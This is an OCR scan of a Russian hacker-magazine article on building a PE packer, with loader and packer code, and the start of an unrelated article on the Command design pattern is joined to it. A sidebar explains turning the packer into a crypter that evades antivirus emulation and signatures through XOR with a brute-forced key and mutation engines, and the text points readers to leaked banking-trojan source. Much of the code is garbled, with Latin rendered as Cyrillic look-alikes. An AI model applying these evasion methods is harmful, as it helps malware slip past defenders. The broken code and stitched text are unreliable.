ІІРХ уже тогда был очень занудным — в общем, мы почти ничего из 
тех сорцов не извлекли. Мэтт Питрек, и тот помог больше. Сейчас 
с инфой значительно проще стало. Почти всё есть. Даже сорцы 
вполне себе нормального банковского троя можно скачать (2еиз 
2. 0.8. 9, Ьіі.Іѵ/ѵЗЕіУР ). Да чего уж там, сорцы винды уже давно в 
паблике (ѴѴіпсІоѵѵз 2000, Ьі1.Іѵ/гВ21Сѵ ). 

Об упаковщиках информация тоже есть, но в основном ис- 
следовательская, непосредственно разработки касающаяся не с 
той стороны, с которой нам бы хотелось. Отличным примером тому 
является статья «Об упаковщиках в последний раз» [ ЫС1 у/уРРСх2. 
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Создание хедера с помощью Ьіп2Ь можно автоматизировать 



Кусок кода парсера таблицы импорта 



ЬіЕІѵЛ5ЦхТ7 ) в двух частях, написанная небезызвестными гуру 
Ѵоіобуа и ЫЕОх. 

Мы, в свою очередь, постараемся максимально конкретно и по- 
следовательно дать информацию именно о разработке простейше- 
го, но легко модифицируемого под любые свои нужды РЕ-пакера. 

АЛГОРИТМ 

Вот есть у нас, например, поіерасі.ехе. В обычном своем 32-бит- 
ном виде он весит где-нибудь 60 Кб. Мы хотим его существен- 
но уменьшить, сохранив при этом всю его функциональность. 
Какими должны быть наши действия? Ну, для начала мы наш 
файлик от первого до последнего байтика прочтем в массив. 
Теперь мы можем делать с ним всё что угодно. А нам угодно его 
сжать. Берем его и отдаем какому-нибудь простому компрессору, 
в результате чего получаем массив уже не в 60 Кб, а, например, 
в 20 Кб. Это круто, но в сжатом виде образ нашего «Блокнота» — 
это просто набор байтов с высокой энтропией, это не экзешник, и 
его нельзя запустить, записав в файл и кликнув. Для массива со 
сжатым образом нам нужен носитель (загрузчик), очень малень- 
кий исполняемый файл, к которому мы прицепим наш массив и 
который его разожмет и запустит. Пишем носитель, компилируем, 
а затем дописываем к нему в конец наш сжатый «Блокнот». Со- 
ответственно, если полученный в результате всех действий файл 
(размер которого немного больше, чем у просто сжатого «Блокно- 
та») запустить, он найдет в себе упакованный образ, распакует, 
распарсит его структуру и запустит. 

Как видишь, нам предстоит автоматизировать не слишком 
сложный процесс. Нужно будет просто написать две программы, 
загрузчик и, собственно, упаковщик. 

Алгоритм работы упаковщика: 

• считать РЕ-файл в массив; 

• сжать массив каким-нибудьалгоритмом сжатия без потерь; 

• в соответствии с форматом РЕ дописать сжатый массив к 
шаблону-загрузчику. 

Алгоритм работы загрузчика: 

• найти в концесебя массив со сжатым РЕ-файлом; 

• разжать его; 

• распарсить за головки РЕ-файл а, расставить все права, выде- 
литьпамятьи в итогезапустить. 

Начнем разработку с загрузчика, так как именно им впослед- 
ствии будет манипулировать упаковщик. 

ЗАГРУЗЧИК 

Итак, первое, что должен сделать наш загрузчик, — это найти в 
своем теле адрес массива со сжатым образом РЕ-файла. Способы 



поиска зависят от того, как упаковщик имплантировал этот массив 
в загрузчик. 

Например, если бы он просто добавил новую секцию с данными, 
то поиск выглядел бы так: 

Поиск сжатого образа в последней секции 

// Получаем адрес начала РЕ-заголовка загрузчика в памяти 
НМОР1Л- Е ІіМосІиІе = 6е1:МосІи1еНапсІ1е(ІМЦи. ); 

Р ІМАС Е_005_Н Е Ай Е К рйозНеасІег = (РІМАСЕ_005_НЕА0ЕК)ІіМосІи1е; 

Р ІМАС Е_І\ІТ_Н Е Ай Е КБ рІЧТНеасІегз = 

МакеРѣг (РІМАеЕ_І\ІТ_НЕА0ЕК5, ІіМосІиІе., р0озНеасІег->е_1Тапем) ; 
РІМА6Е_5ЕСТІ0І\І_НЕА0ЕК рБесЪіопз = 

ІМА6Е РІК5Т БЕСТИЮ (рІ\ІТНеасІег5Ѵ. 

// Структура, описывающая последнюю секцию нашего 
загрузчика 

РІМА6Е 5ЕСТІОІМ НЕАРЕК рІ_аз1:5ес1:іоп = 

&рБес1:іоп5[рМТНеасІеп5->Рі1еНеасІег.МитЬепО-Р5ес1:іоп5 - 1]; 



// Собственно, найденный образ 

І.РВУТЕ рЬРаскесІІтаее = МакеРІтаРВУТЕ . ІіМосІиІе. 

рІЭ5І:$ес1:іоп->Ѵіг1:иаІАсІсІге55^ ; 

// Его размер „ „ . 

РШКР сІмРаскесІІта^еБіге ^рІаз1:5ес1:іоп->5І2еОТКаѵ\/Ра1:а; 

Но, на наш с Волком взгляд, этим кодом в загрузчике можно 
пожертвовать. Вообще, всё, что может сделать упаковщик, пусть 
он и только он и делает. Адрес образа в адресном пространстве за- 
грузчика можно вычислить заранее, при упаковке, а потом просто 
вписать в нужное место. Для этого оставляем в нашей программе 
две метки: 

І-РВУТЕ рЬРаскесІІта^е = (І_РВУТЕ) ѲхРЕАРВЕЕР; 

РЫСЖР сІыРаскесІІта^еБіге = ѲхВЕЕРСАСЕ; 

Когда упаковщик будет имплантировать в загрузчик массив со 
сжатым образом, он пройдется сигнатурным поиском по телу за- 
грузчика и заменит ОхОЕАОВЕЕР на адрес массива, а ОхВЕЕРСАСЕ 
— на его размер. 

Теперь, когда мы определились, как искать адрес, можно вы- 
брать готовую реализацию алгоритма сжатия для использования в 
нашем упаковщике. 

Неплохой вариант — использовать арПЬ ( ѵѵѵѵѵѵ.іЬзепзоІТѵѵаге. 
сот ), маленькую библиотеку с аккуратным и очень компактным 
кодом, реализующую сжатие на базе алгоритма Лемпеля-Зива (Б2). 
И мы обязательно его выбрали бы в любой другой день, однако 
сегодня у нас настроение для еще более простого и компактного 
решения — встроенных в ѴѴіпсІоѵѵз функций! 
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Начиная с ХР, наша любимая пІсІІІ.сІІІ начала экспортировать две 
прекрасные функции: 



МТ5ТАТУ5 

іп 


К11СотрпеззВи-р-Рег( 

ІІ5НОКТ СотрпеззіопРогта1:АпсІЕп§іпе і 


іп 


РІІСНАК ІІпсотргеззесІВи-р-Рег, 


іп 


ШОИС ІІпсотрпеззесІВи-р-РегБіге^ 


оиі 


РІІСНАК СолргеззесІВи-р-Рег, 


іп 


Ш0М6 СотргеззесІВи-р-РепБіге. 


іп 


ІИ-РЫб ЦпсотрпеззесІСІіипкБіге. 


оиі 


Р111_0ме Ріпа1СотргеззесІ5І2е і 


іп 


РѴОІР ІлІогкБрасе 


); 


НТ5ТАТІІ5 КіЮесоггюгеззВи-р-РегГ 


іп 


ІІБНОКТ СолтргезУ,опРогта1: і 


оиі 


РІІСНАК ЦпсотргеззесІВи-р-Рег . 


іп 


ІІЮМС ІІпсотргеззесІВи-р-РегБіге., 


іп 


РІІСНАК СотргеззесІВи-р-Рег, 


іп 


ШОИе СотргеззесІВи-р-РепБіге^ 


оиі 


РШОИС РіпаШпсотопеззесІБіге 


и 



Названия их говорят сами за себя — одна функция для ком- 
прессии, другая для декомпрессии. Конечно, если бы мы разра- 
батывали действительно серьезный продукт, мы бы эти функции 
не трогали, ведь остались еще компьютеры и с ѴѴіпсІоѵѵз 2000, и 
даже с І\ІТ 4.0 ;), но для наших скромных целей РНСотргеззВіШеЛ 
РіЮесотргеззВиИег вполне подойдут. 

В хедерах РІаНогт 5йК этих функций нет, статически мы их 
прилинковать не сможем, поэтому придется воспользоваться 
ВеіРгосАсІсІгезз: 

Определение адреса функции для распаковки 

// Описываем переменную КіІРесотргеззВи-р-Рег типа 

«функция с шестью параметрами» 

йІлІОРШ ( зісісаіі *К110есотргез5Ви-р-Рег) 

(ЦІ-ОІМС, РѴ0ІР.ЦІ.0М6, РѴОІОд ЦШМ6, РЦШІМСП х 



// Присваиваем ей адрес КіІРесотргеззВи-р-Рег в піісііі . сііі 
(РАКРКОС&^КіІРесотргеБзВи-р-Рег = СеІіРгосАсІсІгеззС 

ЬоасШЬгагу ( "піісііі. сііі" ^ . "КіІРесотргеББВи-р-Рег" ); 

Когда есть чем распаковать и есть что распаковать, можно уже, 
наконец, это сделать. Для этого мы выделим память с запасом (так 
как не знаем объем распакованного файла) и запустим определен- 
ную выше функцию: 

РЫОКР сЫіта§еБІ 2 е = 0; 

РІлІСЖР сЫІта§еТетр5І2е = сІмРаскесІІта§е5І2е * 15; 

// Выделяю память под распакованный образ 

І_РѴОІР рЫша§е = Ѵіг1:иа1А11ос( N1111. сІмІта^еТетрБіге., 
МЕМ_СОММІТ, РАСЕ_КЕАВІлІКІТЕ ); 



ДЛЯ СЖАТИЯ УДОБНО БЫЛО БЫ 
ИСПОЛЬЗОВАТЬ МАЛЮСЕНЬКУЮ 
БИБЛИОТЕКУ АРЫВ, НО 
МЫ ПОСТУПИЛИ ПРОЩЕ И 
ЗАЮЗАЛИ ВСТРОЕННЫЕ В 
ВИНДУ ФУНКЦИИ 



// Распаковываю 

КІІРесотргеззВи-р-РеКСОМРКЕЗБІОМ РОКМАТ І_2МТ1 . 
рЫша^е. сІмІта§еТетр5І2е. 
рЬРаскесІІта^е. сІіл/РаскесІІта^еБіге. 

&сЫІта§е5І2е) ; 

Параметр С0МРРЕ55І0І\І_Р0РМАТ_12МТ1 означает, что мы 
хотим использовать классическое 12-сжатие. Функция умеет 
сжимать и другими алгоритмами ( Ьі11у/зѴ95Ѵи ). но нам хватит и 
этого. 

Теперь у нас в памяти (рЫтаде) есть сырой образ РЕ-файла. 
Чтобы его запустить, нужно провести ряд манипуляций, которые 
обычно делает нативный РЕ-загрузчик ѴѴіпсІоѵѵз. Мы сократим 
список до самых-самых необходимых: 

1. Разместить начало образа (хедеры) по адресу, указанному 
в поле Ітаде Вазе опционального заголовка (О РТІ О N АЬ_ 
НЕАОЕР). 

2 . Разместить секции РЕ-файла по адресам, указанным в табли- 
це секций. 

3. Распарсить таблицу импорта, найти все адреса функций и 
вписать в соответствующие им ячейки. 

Естественно, стандартный РЕ-загрузчик выполняет целую 
кучу других действий, и тем, что мы их отметаем, мы огра- 
ничиваем совместимость нашего упаковщика с некоторыми 
РЕ-файлами. Но для абсолютного большинства хватит и этих 
действий — можно не фиксить релоки, фиксапы и прочую редкую 
и противную фигню. 

Если вдруг тебе захочется серьезной совместимости, ты или 
сам напишешь крутой РЕ-лоадер, или найдешь в Сети наибо- 
лее полную его реализацию — намсВолкомбылолень писать 
свою, и мы воспользовались трудами дг8 из ЬеІІкпідЫз ( ЬіІІѵ/ 
ІсббсВ ) выкинув из нее всё, что не поняли ;). Даже в урезанном 
виде функция РЕ-лоадера — это строчек сто, не меньше, поэтому 
здесь мы приведем только ее прототип (полный код лежит на 
диске): 

НМОРІЛ-Е І_оасІЕхеси1аЫе (І.РВУТЕ іта%е. 

РІлІОКР* АсІсІгеззО-РЕпІігуРоіпІ:) 

Она принимает указатель на наш распакованный образ и 
возвращает дескриптор загруженного модуля (эквивалент 
адреса, по которому загружен РЕ-файл) и адрес точки входа (по 
указателю АсІсІгеззІЖпІгуРоіпі). Эта функция делает всё, чтобы 
правильно разместить образ в памяти, но не всё, чтобы можно 
было, наконец, передать туда управление. 

Дело в том, что система по-прежнему ничего не знает о за- 
груженном нами модуле. Если мы прямо сейчас вызовем точку 
входа, с которой сжатая программа начнет выполнение, то может 
возникнуть ряд проблем. Работать программа будет, но криво. 

Например, 6еМосМеНапсІІе(І\ІІІіи будет возвращать Ітаде 
Вазе модуля загрузчика, а не распакованной программы. Функ- 
ции РіпсІРезоигсе и ІоасІРезоигсе будут рыться в нашем загруз- 
чике, в котором никаких ресурсов нет и в помине. Могут быть и 
более специфические глюки. Чтобы всего этого не происходило, 
нужно в системных структурах процесса по возможности везде 
обновить информацию, заменив адреса модуля загрузчика на 
адреса загруженного модуля. 

В первую очередь нужно пофиксить РЕВ (Ргосезз Епѵіготепі 
ВІоск), в котором указан старый Ітаде Вазе. Адрес РЕВ очень 
легко получить, в юзермоде он всегда лежит по смещению 0x30 в 
сегменте Р5. 

РРЕВ РеЬ; 

азгп { 

ризіі еах 

шоу еах. Р5: [0x30] ; 
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Процесс отладки бажного файла в ОІІуОЬд 



тоѵ РеЬ і еах 
рор еах 

Ь- 

// ІіМосІиІе - адрес распакованного и загруженного нами РЕ- 
файла 

РеЬ->Іта§еВавеАсІсІге55 = ІіМосІиІе; 

Также не помешает пофиксить списки модулей в структуре 
ЮР_0АТА, на которую ссылается РЕВ. Всего там три списка: 

• ІпІ_оасІ0гсІегМосІиІеи5І — список модулей в порядке загрузки; 

• ІпМетогуОгсІегМосІиІеизІ — список модулей в порядке рас- 
положения в памяти; 

• ІпІпіІіаІііаІіопОгсІегМогіиІеизІ — список модулей в порядке 
инициализации. 

Нам надо найти в каждом списке адрес нашего загрузчика и за- 
менить его на адрес загруженного модуля. Как-нибудь так: 

// Первым загружается наш модуль, так что 

// по всему списку проходить не обязательно 

РІ.РКРАТАТ А ВІ.ЕЕІМТКУ рІ_сІгЕп*гу = (РІ_РК_РАТА_ТАВІ_Е_ЕІ\ІТКѴ) 

( РеЬ- >1с1г- >Мос1и1еИ51:Еоас10гс1ег . РІіпЮ ; 
рІ_сІгЕп1:гу->В11Ва5е = ІіМ осІиІе; 



Вот теперь можно смело вызывать точку входа загруженно- 
го модуля. Он будет функционировать так, словно был вызван 
самым обычным образом. 

І_РѴОІР еп1:гу = (ІРѴОІР)((РШКР) ІіМосІиІе + АсІсІге550-РЕп1:гуРоіп1:); 
азт саіі епТгу; 

АсІсІгеззСМЕпІгуРоіпІ — это относительный виртуальный 
адрес (РѴА, Реіаііѵе ѴИиаІ Асісігезз) точки входа, взятый из 
орііопаі Ьеасіег в функции І_оасІЕхесиІаЫе. Для получения абсо- 
лютного адреса мы просто прибавили к РѴА адрес базы (то есть 
свежезагруженного модуля). 

УМЕНЬШЕНИЕ РАЗМЕРА ЗАГРУЗЧИКА 

Если наш загрузчик скомпилировать и собрать в Ѵ5 2010 с 
флагами по умолчанию, то мы получим не двухкилобайтную 
программку-носитель, а монстра размером более 10 Кб. Студия 
встроит туда целую кучу лишнего, а нам надо всё это оттуда вы- 
грести. 

Поэтому в свойствах компиляции проекта загрузчика (вкладка 
С/С++) мы делаем следующее: 

• В разделе «Оптимизация» выбираем «Минимальный размер 
(/01)», чтобы компилятор старался сделать все функции более 
компактными. 
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ЕСЛИ БЫ МЫ ИСПОЛЬЗОВАЛИ 
ГЛОБАЛЬНЫЕ ПЕРЕМЕННЫЕ, 
ТО НАМ ТАКЖЕ НАДО БЫЛО 
БЫ ОБЪЕДИНИТЬ С КОДОМ 
СЕКЦИЮ .БАТА 

• Там же указываем приоритет размера над скоростью (флаг/Оз). 

• В разделе «Создание кода» выключаем исключения С++, мы их 
не используем. 

• Проверка переполнения буфера нам тоже не нужна (/65-). Это 
штука хорошая, но не в нашем случае. 

В свойствах линкера (компоновщика): 

• Отключаем к чертям «Манифест». Он большой, и из-за него в 
загрузчике создается секция .гзгс, которая нам совершенно не 
нужна. Вообще, каждая лишняя секция в РЕ-файле — это мини- 
мум 512 совершенно ненужных байт, спасибо выравниванию. 

• Отключаем создание отладочной информации. 

• Лезем во вкладку «Дополнительно». Выключаем «Внесение 
случайности в базовый адрес» (/0ѴМАМІСВА5Е:І\І0), иначе лин- 
кер создаст секцию релоков (.геіос). 

• Указываем базовый адрес. Выберем какой-нибудь нестандарт- 
ный повыше, например 0x02000000. Именно это значение будет 
возвращать 6еіМосМеНапсІІе(МІіи_) в загрузчике. Можно его 
даже захардкодить. 

• Указываем нашу точку входа, а не СРТ-шную: /ЕІ\ІТПѴ:ѴѴіпМаіп. 
Вообще, мы привыкли это делать директивой ргадта прямо из 
кода, но раз уж залезли в свойства, то можно и тут. 

Остальные настройки для линкера задаем непосредственно из 
кода: 

#ргаріа согпгпепЕбІіпкег . "/МЕК6Е : . гс!аЕа=.ЕехЕ") 

Здесь мы объединили секцию .гсіаіа, в которой содержатся 
данные, доступные только для чтения (строки, таблица импорта 
и т. п.), с секцией кода ЕехС Если бы мы использовали глобаль- 
ные переменные, то нам также надо было бы объединить с кодом 
секцию .баіа. 

#рга§та соітпепЕ(1іпкег . "/МЕК6Е : ,с!аЕа=.ЕехЕ") 

// К данным из .сІаЕа нужен доступ на запись. 

// а не только на чтение и выполнение 

#рга%та соттепЕ(1іпкег , "/ЗЕСТІОІМ: .ЕехЕ., ЕІлІК") 



Всего перечисленного хватит, чтобы получить лоадер размером 
в 1,5 Кб. 



УПАКОВЩИК 

Нам остается разработать консольную утилиту, которая будет сжи- 
мать отданные ей файлы и прицеплять к лоадеру. Первое, что она 
должна делать по описанному в начале статьи алгоритму, — это 
считывать файл в массив. Задача, с которой справится и школьник: 

НАШІ.Е НРіІе = СгеаЕеГі1е(аг§ѵ[1 ] х 6ЕНЕКІС_КЕАР, 

РН Е ЗНАКЕ КЕАР, N1)1.1. . ОРЕМ_ЕХІ5ТІНС, 
ГІІ. ЕАТ ТКІВЦ ТЕМСЖМАІ- . МЦН); 

ОІлІОРШ сЫІта^еБіге = Се1:Рі1е5І2е(ІіРі1е, 0); 

І.РВѴТЕ 1рІта§е = пеш ВУТЕ [ сЫІтаее Біге] , 

ІрСотргеззесІІта^е = пеы ВУТЕ[сІыІта^е5І2е] ; 

РІлІСЖР сІыКеасІесІ ; КеасІГіІеПіГіІе. Іріта^е. 

сІыІта^еБіге. &с!ыКеасІесІ . 0Ѵ. 

СІ05еНапсІ1е(ІіРі1е)н 

Далее наш пакер должен сжать полученный файл. Мы не будем 
проверять, действительно ли это РЕ-файл, корректные ли у него 
заголовки и т. п., — всё оставляем на совести пользователя, сразу 
сжимаем. Для этого воспользуемся функциями РЛСотргеззВиНег 
и РЛбеіСотргеззіопѴѴогкЗрасеЗіге. Первую мы уже описали выше 
— она сжимает буфер, вторая же нужна, чтобы вычислить объем 
памяти, необходимой для работы сжимающего движка. Будем 
считать, что обе функции мы уже динамически подключили (как и в 
загрузчике), остается только их запустить: 

РІлІСЖР ЕогтаЕ = 

СОМРКЕ55ІОМ_РОКМАТ_І_2МТ1 1 СОМРКЕ55ІОМ_ЕМ6ІМЕ_5ТАМРАКР; 
РІлІСЖР сІыСотргеззесІБіге, сІмВи-р-РегІлІзБіге., сІыРга^тепЕІлІвБіге; 
КЕ16еЕСотрге55ІопЫогкБрасеБІ2е( 

-РогтаЕ. &с!іл/Ви-р-Рег1лІ5БІ2е . &с!ыРпа^тепЕЫ55І2е ); 

І.РВУТЕ ыогкзрасе = пеы ВУТЕ [сІіл/Ви-р-РегІлІзБіге] : 
КЕ1Сотрге55ВиЕЕег(ЕогтаЕ. // тип сжатия и движок 

1рІта§е, // масси в для сжатия 

сЫІта^еБіге, // его размер 

ІрСотргеззесИтаде . // буфер для результата 

сІыІта^еБіге, // его разме р 

4096. // размер кусков, не важен 

&с!ыСотрпе55есІ5І2е . // указатель на дворд для размера 

// результата 

ыогкзрасе) ; // буфер для работ ы 

В результате у нас есть сжатый буфер и его размер, можно 
прикрутить их к загрузчику. Чтобы это сделать, нужно для начала 
скомпилированный код нашего загрузчика встроить в упаковщик. 
Самый удобный способ засунуть его в программу — это воспользо- 
ваться утилитой Ып2Ь ( ѵѵѵѵѵѵ.сІеасІпосІе.огд/5ѵѵ/Ьіп2Ь/ ). Она конвер- 
тнет любой бинарник в удобный сишный хедер, все данные в нем 
будут выглядеть как-то так: 



ПЕРЕДЕЛЫВАЕМ В КРИПТОР 



Собственно, от криптора наш 
пакер отличает совсем немногое: 
отсутствие функции шифрования и 
противоэмуляционных приемов. Самое 
простое, что можно с ходу сделать, это 
добавить хог всего образа сразу после 
распаковки в загрузчике. Но, чтобы 
эмуляторы антивирусов подавились, этого 



недостаточно. Нужно как-то усложнить 
задачу. Например, не прописывать ключ 
хог'а в теле загрузчика. То есть загрузчик 
не будет знать, каким ключом ему надо 
расшифровывать код, он будет его 
перебирать в определенных нами рамках. Это 
может занять какое-то время, которое есть у 
пользователя, в отличие от антивируса. 



Также ключ можно сделать зависимым от 
какой-нибудь неэмулируемой функции или 
структуры. Только их еще найти надо. 

Чтобы код загрузчика не палился 
сигнатурно, можно прикрутить купаковщику 
какие-нибудь продвинутые вирусные 
движки для генерации мусора и всяческого 
видоизменения кода, благо их в Сети навалом. 
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НОѴѴ-ТО: РЕ-пакер 



ипБІепесІ і г 1оасІег_5І2е = 1536; 
ипБІепесІ сЬа г 1оасІег[] = { 

Ѳх4сІ . 0x5а . ѲхѲѲ . ѲхѲѲ . 0x01 . ѲхѲѲ . ѲхѲѲ . ... 

Скармливаем ей файл с нашим лоадером и получаем всё не- 
обходимое для дальнейших извращений. Теперь, если придер- 
живаться алгоритма, описанного в начале статьи, мы должны 
прицепить к загрузчику сжатый образ. Здесь нам с Волком 
придется вспомнить 90-е и свое вирмейкерское прошлое. Дело в 
том, что внедрение данных или кода в сторонний РЕ-файл — это 
чисто вирусная тема. Организуется внедрение большим количе- 
ством разных способов, но наиболее тривиальные и популярные 
— это расширение последней секции или добавление своей 
собственной. Добавление, на наш взгляд, чревато потерями при 
выравнивании, поэтому, чтобы встроить сжатый образ в наш 
загрузчик, мы расширим ему (загрузчику) последнюю секцию. 
Вернее, единственную секцию — мы же избавились от всего 
лишнего ;). 

Алгоритм действий будет такой: 

• Находим единственную секцию (.Іехі) в загрузчике. 

• Изменяем ее физический размер, то есть размер на диске 
(БігеОІРаѵѵОаІа). Он должен быть равен сумме старого разме- 
ра и размера сжатого образа и при этом выравнен в соответ- 
ствии с файловым выравниванием (РіІеАІідптепі). 

• Изменяем виртуальный размер памяти (Мізс.ѴИиаІБіге), при- 
бавляя к нему размер сжатого образа. 

• Изменяем размер всего образа загрузчика (ОрІіопаІНеасІег. 
БігеОИтаде) по древней формуле [виртуальный размер по- 
следней секции] + [виртуальный адрес последней секции], 
не забывая выравнивать значение по РіІеАІідптепЕ 

• Копируем сжатый образ в конец секции. 

Тут есть небольшая хитрость. Дело в том, что наша студия 
делает виртуальный размер (Мізс.ѴИиаІБіге) секции с кодом 
(.Іехі) равным реальному невыравненному размеру кода, то есть 
указывает размер меньше физического. Азначит, есть шанс 
сэкономить до 51 1 байт. 

То есть так бы мы записали данные после кучи выравниваю- 
щих нулей, а зная фишку, можно записаться поверх этих нулей. 
Вот как все наши мысли будут выглядеть в коде: 

Расширение секции кода 

// Создаем копию образа нашего загрузчика с запасом по 
памяти 

РВУТЕ рЫоасІегСору = 

пеш ВУТЕ[1оасІеп БІге + сІіл/СотргезБесІБіге + 0x1000]; 
тешсрѵСрЫоасІепСорѵ. (І-РВУТЕ^&ІоасІег . Іоасіег БІгеѴ, 



// Определяем его заголовки 

Р I МАС Е_ООБ_Н Е АО Е К СІОБ^ (РІМАСЕ_005_НЕА0ЕК) рЫоасІегСору; 
РІМА6Е_ІМТ_НЕА0ЕК5 пТ = 

МакеР1:г(РІМА6Е_МТ_НЕАРЕК5 < рЫоасІегСорѵ. сІ05->е_1ТапеыѴ. 

// Расшир яема я секция 

РІМАСЕ_5ЕСТІ0І\І_НЕА0ЕК ТехТ = ІМАСЕ_РІК5Т_5ЕСТІОІ\І(п1:) ; 



// Копируем сжатый образ в конец секции поверх нулей 
тетсру(&рЬІ_оасІегСору[ 

1:ех1:->Роіп1:егТоВаыОа1:а + 1:ех1:->МІ5С .ѴігЕиаІБіге] . 
ІрСошргеББесІІта^е. сІыСотргеББесІБіге') ; 



// Фиксим физический размер, учитывая фишку с МІБС.ѴігЕиаІБіге 
1:ех1:->5І2е0ТКаы0а1:а = 

АІ_ІСІ\І(1:ех1:->МІ5с .Ѵіг1:иа15І2е + сІыСотргезБесІБіге^ 
п1:->Ор1:іопа1НеасІег. Рі1еА1і§птеп1:) ; 

// Фиксим виртуальный (а на самом деле реальный') размер 
1:ех1:->МІ5с .ѴігЕиаІБіге += сІіл/СотргезБесІБіге; 

// Фиксим размер образа 




Наш упаковщик сжал поіерасі.ехе лучше, чем ІІРХ! 

п1:->0р1:іопа1НеасІеп.5І2е0ТІта§е = 

АІІСМ(1:е5І:->МІ5С.ѴігТиа15І2е + Те5І:->Ѵіг1:иа1АсІсІге55., 
п1:->Орііопа1НеасІег. Рі1еА1і§птеп1:) ; 



// Вычисляем размер получившегося файла 

РІлІОРШ сІыМеыРіІеБіге = рБес1:іоп5->5І2е0ТКаы0а1:а + 
1:е5І:->Роіп1:егТоКаы0а1:а; 

О, мы едва не забыли заменить метки ОхОЕАОВЕЕР и 
ОхВЕЕРСАСЕ, оставленные в загрузчике, на реальные значе- 
ния! ОхВЕЕРСАСЕ у нас меняется на размер сжатого образа, а 
ОхОЕАОВЕЕР — на его абсолютный адрес. Адрес образа вы- 
числяется по формуле [адрес образа] + [виртуальный адрес 
секции] + [смещение образа относительно начала секции]. 
Следует отметить, что замену надо производить еще до обнов- 
ления значения Мізс.ѴИиаІБіге, иначе полученный в результате 
файл не заработает. 

Ищем и заменяем метки с помощью очень простого цикла: 

-Рог (іп~Е і = 0; і < Бітріе раскег_5І 2е; і++) 

і-р (*(РЫОКР*) (&рЫоас!егСору [і] ^ == ОхВЕЕРСАСЕ) 
*( , РЫОКР*Н&рЫоасІепСорѵ[і] ) = сІыСотргезБесІБіге ; 
еізе і-Р (*(РЫОКР*Н&рЫоасІепСорѵ[і]) == ѲхРЕАРВЕЕР) 
*(РЫОКР*и&рЫоасІепСору[і] = 
п1:->Ор1:іопа1НеасІег Лта^еВазе + 
■рех-р->Ѵіг1:иа1АсІсІге55 + 

1:ех1:^>МІ5с . Ѵіг1:иа15І2е; 

Вот, собственно, и всё. Теперь в памяти у нас есть упакованный 
и готовый к работе файл, достаточно сохранить его на диске с по- 
мощью функций СгеаІеРіІе/ѴѴгіІеРіІе. 

ВЫВОДЫ 

Если сравнивать эффективность сжатия нашего упаковщика с ІІРХ 
на примере поіерасі.ехе — мы выигрываем примерно 1 Кб: 46 592 
байта у нас против 48 128 у ІІРХ. Однако наш пакер далеко не со- 
вершенен. И это очень заметно. 

Дело в том, что мы сознательно проигнорировали такую 
важную вещь, как перенос ресурсов. Полученный в результате 
сжатия файл потеряет иконку! Реализовать недостающую функ- 
цию предстоит тебе самому. Благодаря полученным из этого 
материала знаниям, никаких сложностей у тебя с этим делом не 
возникнет. И-И 
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сіееопіз (сіееопізйдтаіі.сот) 



Паттерн 

«Команда» 





УНИФИЦИРУЕМ ИНТЕРФЕЙСЫ 
ВЫПОЛНЕНИЯ КОМАНД 



Большая часть современного 
ПО разрабатывается группами 
программистов. Кто-то отвечает 
за пользовательский интерфейс, кто- 
то за ядро, а кто-то за дополнительные 
модули. Чтобы работа всех этих людей 
не пропала даром, нужно грамотно 
объединить разные части проекта, 
не забыв при этом о возможном его 
расширении. Для этого нам пригодится 
паттерн проектирования «Команда», 
который инкапсулирует в себе 
исполнителя задачи и ее условия. 




Паттерн «Команда: 



авай представим, что мы работаем в компании, которая 
пишет сложный многокомпонентный софт. Проект узкоспе- 
циализированный и имеет много разнообразных модулей, 
количество которых может со временем расширяться. Наша задача 
состоит в том, чтобы написать гибкую и удобную систему горячих 
клавиш для этой программы. Набор возможных сочетаний ограни- 
чивается хоткеями от <сігі-0> до <сігі-9>, а также включает в себя 
комбинацию сігі-2 для отмены действия. 

Казалось бы, всё просто: накодил большой блок бѵѵіісЬ, который 
при нажатии разных сочетаний кнопок вызываетту или иную 
функцию какого-либо модуля, и радуйся. Но, во-первых, такой 
подход не отличается гибкостью. Когда проект пополнится новыми 
модулями или Ьоікеуз, нам придется менять код этого раздутого 
оператора ветвления, из-за чего он впоследствии раздуется еще 
больше. А во-вторых, начальство большими красными буквами на- 
писало, что у пользователя должна быть возможность переназна- 
чить эти горячие клавиши. Таким образом, жестко забить команды 
в код бѵѵіісЬ у нас точно не выйдет. 

Взглянув на код модулей проекта и списки их команд, которые 
можно присвоить хоткеям, мы еще больше убеждаемся, что при- 
дется изрядно помучиться, прежде чем мы придумаем более-менее 
рабочую архитектуру всего этого. 




Интерфейсы модулей, доступные для обращения через НоІКеуз 

сІаББ Саісиіаіог 

І_ 

риЫіс : 

ѵоісі гип СаІсО; 
ѵоісі с1озеСа1с(); 

} 



с Іа 5 5 Ргіпіег 

І_ 

риЫіс : 

ѵоісі ргіпіРоситепІіП ; 

ѵоісі ргіп1:Іта§е(); 

ѵоісі ргіп іЕтаіЮ ; 

Ь- 



сІазБ Вгоызег 
риЫіс : 

гипВгоызег() ; 
ѵоісі сІозеВгоызегОі 



// И дальше много всяких разных классов 

ПАТТЕРН «КОМАНДА» 

Отбросив лирику, перейдем к изучению паттерна «Команда», кото- 
рый должен помочь нам в этом нелегком деле. Для начала следует 
разобраться, что мы имеем. У нас есть множество модулей с самыми 
разнообразными АРІ. Также у нас есть окошко, в котором пользователь 
может выбрать из списка одну из команд, предоставляемых модулями, 
и закрепить ее за определенным сочетанием клавиш. 

Формально выражаясь, обработчик нажатий клавиатуры — это 
клиент, АРІ-функции модулей, вызываемые с помощью горячих 
клавиш, — это задачи, а модули, предоставляющие эти задачи, 

— это исполнители. Окошко с настройками Ьоікеуз представ- 
ляет собой некий посредник между клиентом и исполнителем, 
скрывающий все детали выполняемых операций. Такая структура 
позволяет полностью отделить клиент от исполнителя, то есть 
пользователь понятия не имеет, какой модуль работает при нажа- 
тии той или иной комбинации клавиш и что он делает. И это очень 
хорошо, так как чем лучше изолированы друг от друга части кода, 
тем надежней работает программа. 



Для такой изоляции нам нужно определить объект команды, 
а следовательно, и соответствующий интерфейс. Он достаточно 
прост и определяет всего один метод ехесиІеП, который должен 
выполнять метод какого-либо из модулей. 

Интерфейс объекта «Команды» 

сіэбб СоттапсІ 

і_ 

риЫіс: 

ѵоісі ехесиіер = Ѳ; 

} 



Для определения конкретного объекта мы просто объяв- 
ляем новый класс, который наследует интерфейс СоттапсІ, 
и определяем его метод ехесиЫ). Допустим, мы хотим создать 
команду, запускающую калькулятор. Для этого мы создадим 
класс РипСаІсСоттапсІ, который будет наследовать интерфейс 
СоттапсІ, и переопределим ехесиІеП для вызова метода гипСаІсО 
модуля Саісиіаіог. 

Команда запуска калькулятора 

